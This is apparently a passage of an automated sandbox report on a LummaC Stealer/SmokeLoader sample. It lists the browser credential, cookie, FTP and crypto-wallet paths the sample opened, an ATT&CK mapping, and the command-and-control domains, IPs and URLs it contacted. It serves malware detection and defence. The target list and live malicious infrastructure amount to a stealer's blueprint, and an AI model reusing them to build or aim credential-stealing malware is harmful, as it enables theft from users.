          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\8FDD.exeDirectory queried: C:\Users\user\Documents\AIXACVYBSBJump to behavior
          Source: Yara matchFile source: 00000006.00000003.2115559211.000000000196E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.2117087477.000000000196E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.2117148403.000000000196E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.2163676907.0000000001971000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.2116192738.000000000196E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.2115670652.0000000001977000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000003.2131042484.000000000196E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 8FDD.exe PID: 4628, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected LummaC Stealer
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 8FDD.exe PID: 4628, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Yara detected SmokeLoader
          Source: Yara matchFile source: 00000005.00000002.2006931443.00000000045B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1722506072.00000000029D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1722473100.00000000029B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2006836932.0000000004460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation          		1
          DLL Side-Loading          		32
          Process Injection          		11
          Masquerading          		2
          OS Credential Dumping          		641
          Security Software Discovery          		Remote Services41
          Data from Local System          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		Boot or Logon Initialization Scripts1
          DLL Side-Loading          		23
          Virtualization/Sandbox Evasion          		LSASS Memory23
          Virtualization/Sandbox Evasion          		Remote Desktop ProtocolData from Removable Media3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          PowerShell          		Logon Script (Windows)Logon Script (Windows)32
          Process Injection          		Security Account Manager3
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive4
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Deobfuscate/Decode Files or Information          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture115
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Hidden Files and Directories          		LSA Secrets11
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Obfuscated Files or Information          		Cached Domain Credentials113
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
          Software Packing          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          File Deletion          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1468481 Sample: file.exe Startdate: 06/07/2024 Architecture: WINDOWS Score: 100 32 mussangroup.com 2->32 34 gebeus.ru 2->34 36 4 other IPs or domains 2->36 54 Snort IDS alert for network traffic 2->54 56 Multi AV Scanner detection for domain / URL 2->56 58 Found malware configuration 2->58 60 9 other signatures 2->60 8 file.exe 2->8         started        11 crwjtgt 2->11         started        13 explorer.exe 28 142 2->13         started        signatures3 process4 signatures5 70 Detected unpacking (changes PE section rights) 8->70 72 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->72 74 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 8->74 84 2 other signatures 8->84 15 explorer.exe 20 5 8->15 injected 76 Machine Learning detection for dropped file 11->76 78 Maps a DLL or memory area into another process 11->78 80 Checks if the current machine is a virtual machine (disk enumeration) 11->80 82 Query firmware table information (likely to detect VMs) 13->82 process6 dnsIp7 40 mussangroup.com 185.149.100.242, 443, 49741 VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi Turkey 15->40 42 gebeus.ru 58.151.148.90, 49737, 49738, 49739 POWERVIS-AS-KRLGPOWERCOMMKR Korea Republic of 15->42 44 3 other IPs or domains 15->44 26 C:\Users\user\AppData\Roaming\crwjtgt, PE32 15->26 dropped 28 C:\Users\user\AppData\Local\Temp\8FDD.exe, PE32 15->28 dropped 30 C:\Users\user\...\crwjtgt:Zone.Identifier, ASCII 15->30 dropped 46 System process connects to network (likely due to code injection or exploit) 15->46 48 Benign windows process drops PE files 15->48 50 Deletes itself after installation 15->50 52 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->52 20 8FDD.exe 15->20         started        24 WerFault.exe 21 15->24         started        file8 signatures9 process10 dnsIp11 38 foodypannyjsud.shop 188.114.97.3, 443, 49743, 49745 CLOUDFLARENETUS European Union 20->38 62 Antivirus detection for dropped file 20->62 64 Multi AV Scanner detection for dropped file 20->64 66 Query firmware table information (likely to detect VMs) 20->66 68 7 other signatures 20->68 signatures12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          file.exe43%VirustotalBrowse
          file.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\8FDD.exe100%AviraHEUR/AGEN.1313486
          C:\Users\user\AppData\Roaming\crwjtgt100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\8FDD.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\8FDD.exe79%ReversingLabsWin32.Trojan.LummaStealer

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          gebeus.ru16%VirustotalBrowse
          evilos.cc18%VirustotalBrowse
          cdn.discordapp.com1%VirustotalBrowse
          foodypannyjsud.shop19%VirustotalBrowse
          mussangroup.com3%VirustotalBrowse
          api.msn.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
          https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
          https://excel.office.com0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
          http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
          https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
          https://foodypannyjsud.shop/o100%Avira URL Cloudmalware
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          http://x1.c.lencr.org/00%URL Reputationsafe
          https://aka.ms/odirmr0%Avira URL Cloudsafe
          http://x1.i.lencr.org/00%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%Avira URL Cloudsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
          http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
          https://api.msn.com/0%URL Reputationsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
          http://gebeus.ru/tmp/index.php100%Avira URL Cloudmalware
          https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we0%Avira URL Cloudsafe
          https://duckduckgo.com/ac/?q=0%VirustotalBrowse
          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%VirustotalBrowse
          https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
          http://gebeus.ru/tmp/index.php17%VirustotalBrowse
          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%Avira URL Cloudsafe
          https://aka.ms/odirmr0%VirustotalBrowse
          https://foodypannyjsud.shop/api)100%Avira URL Cloudmalware
          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%Avira URL Cloudsafe
          http://cx5519.com/tmp/index.php100%Avira URL Cloudmalware
          contintnetksows.shop100%Avira URL Cloudmalware
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%Avira URL Cloudsafe
          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc940%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%VirustotalBrowse
          http://evilos.cc/tmp/index.php100%Avira URL Cloudmalware
          contintnetksows.shop17%VirustotalBrowse
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%Avira URL Cloudsafe
          http://cx5519.com/tmp/index.php13%VirustotalBrowse
          https://wns.windows.com/L0%Avira URL Cloudsafe
          https://word.office.com0%Avira URL Cloudsafe
          http://evilos.cc/tmp/index.php17%VirustotalBrowse
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%Avira URL Cloudsafe
          https://aka.ms/Vh5j3kPo0%Avira URL Cloudsafe
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%VirustotalBrowse
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%VirustotalBrowse
          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win0%Avira URL Cloudsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
          https://word.office.com0%VirustotalBrowse
          https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%Avira URL Cloudsafe
          http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
          ellaboratepwsz.xyz100%Avira URL Cloudmalware
          http://schemas.micr0%Avira URL Cloudsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%VirustotalBrowse
          https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-0%Avira URL Cloudsafe
          swellfrrgwwos.xyz100%Avira URL Cloudmalware
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%Avira URL Cloudsafe
          ellaboratepwsz.xyz16%VirustotalBrowse
          https://www.rd.com/list/polite-habits-campers-dislike/0%Avira URL Cloudsafe
          swellfrrgwwos.xyz17%VirustotalBrowse
          https://foodypannyjsud.shop/apiT100%Avira URL Cloudmalware
          https://foodypannyjsud.shop/apiS100%Avira URL Cloudmalware
          https://support.microsof0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%VirustotalBrowse
          foodypannyjsud.shop100%Avira URL Cloudmalware
          pedestriankodwu.xyz100%Avira URL Cloudmalware
          https://foodypannyjsud.shop/F9100%Avira URL Cloudmalware
          https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%Avira URL Cloudsafe
          https://foodypannyjsud.shop/ne100%Avira URL Cloudmalware
          https://outlook.com_0%Avira URL Cloudsafe
          https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at0%Avira URL Cloudsafe
          https://api.msn.com/v1/news/Feed/Windows?0%Avira URL Cloudsafe
          http://schemas.mi0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl0%Avira URL Cloudsafe
          https://powerpoint.office.comcember0%Avira URL Cloudsafe
